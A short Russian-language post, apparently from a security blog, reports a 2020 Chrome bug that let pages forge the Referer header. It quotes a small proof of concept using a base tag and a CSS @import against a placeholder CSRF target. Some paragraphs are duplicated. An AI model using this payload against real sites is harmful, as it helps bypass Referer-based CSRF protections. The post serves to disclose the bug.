2020 потрясающий год. Помимо всего прочего, в Chrome можно подделать заголовок Referer, чего не было более десяти лет (раньше с помощью Flash можно было подменить этот заголовок).
PoC был выложен несколько дней назад и совершенно тривиальный:
Запрос к сайту уйдет с заголовком
К счастью, половину интернета этим не заломаешь (SameSite cookie, вот это все), но имейте в виду.
PoC был выложен несколько дней назад и совершенно тривиальный:
<base href="https://www.google.com/">
<style>
@import 'https://CSRF.vulnerable.example/';
</style>Запрос к сайту уйдет с заголовком
Referer: https://www.google.com/
К счастью, половину интернета этим не заломаешь (SameSite cookie, вот это все), но имейте в виду.